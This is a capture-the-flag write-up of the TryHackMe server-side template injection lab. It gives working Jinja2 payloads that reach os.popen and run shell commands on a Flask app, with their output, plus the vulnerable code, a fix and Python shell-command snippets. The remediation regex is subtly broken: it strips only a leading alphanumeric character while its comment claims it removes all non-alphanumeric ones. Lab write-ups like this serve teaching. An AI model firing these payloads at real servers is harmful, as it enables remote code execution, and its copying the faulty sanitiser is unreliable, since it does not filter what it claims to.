# CTF TryHackMe - SSTI

**Source** from THM room : https://tryhackme.com/room/learnssti

**What is Server Side Template Injection?**

Server Side Template Injection (SSTI) is a web exploit which takes advantage of an insecure implementation of a template engine.

## Identification of SSTI

in URL test injecting jinja2 syntax : 

**http://10.10.193.200:5000/profile/{{ 7*7 }}**

and return :

```
<h1>Welcome to the profile of 49!</h1>
```

## Explotation of SSTI

call the current class instance :

```
http://10.10.193.200:5000/profile/{{ ''.__class__ }}

# Return
Welcome to the profile of <class 'str'>!
```

called .__mro__ that allows us to climb up the inherited object tree:

```
http://10.10.193.200:5000/profile/{{ ''.__class__.__mro__ }}

# return 
Welcome to the profile of (<class 'str'>, <class 'object'>)!
```

we want the root object, we access the second property (first index):

```
http://10.10.193.200:5000/profile/{{ ''.__class__.__mro__[1] }}

# Return
Welcome to the profile of <class 'object'>!
```

Now we need to find an object that allows us to run shell commands :

```
http://10.10.193.200:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__() }}

# CTRL+F => subprocess
```

Testing command injection (https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20SideTemplate%20Injection)

```
http://10.10.193.200:5000/profile/{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

# Return
<h1>Welcome to the profile of uid=1000(jake) gid=1000(jake) groups=1000(jake),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
!</h1>
```

## Examination

vulnerable code :

```
            
from flask import Flask, render_template_string
app = Flask(__name__)

@app.route("/profile/<user>")
def profile_page(user):
    template = f"<h1>Welcome to the profile of {user}!</h1>"

    return render_template_string(template)

app.run()
```

```
            
# Raw code
template = f"<h1>Welcome to the profile of {user}!</h1>"

# Code after injecting: TryHackMe
template = f"<h1>Welcome to the profile of TryHackMe!</h1>"

# Code after injecting: {{ 7 * 7 }}
template = f"<h2>Welcome to the profile of {{ 7 * 7 }}!</h1>"
```


## Remediation 

User input can not be trusted!
Every place in your application where a user is allowed to add custom content, make sure the input is sanitised!
This can be done by first planning what character set you want to allow, and adding these to a whitelist.

```         
import re

# Remove everything that isn't alphanumeric
user = re.sub("^[A-Za-z0-9]", "", user)

template = "<h1>Welcome to the profile of {{ user }}!</h1>"
return render_template_string(template, user=user)
```

    
## [TIPS] - Run shell commands in Python

```python
            
# Method 1
import os
os.system("whoami")

# Method 2
import os
os.popen("whoami").read()

# Method 3
import subprocess
subprocess.Popen("whoami", shell=True, stdout=-1).communicate()
```

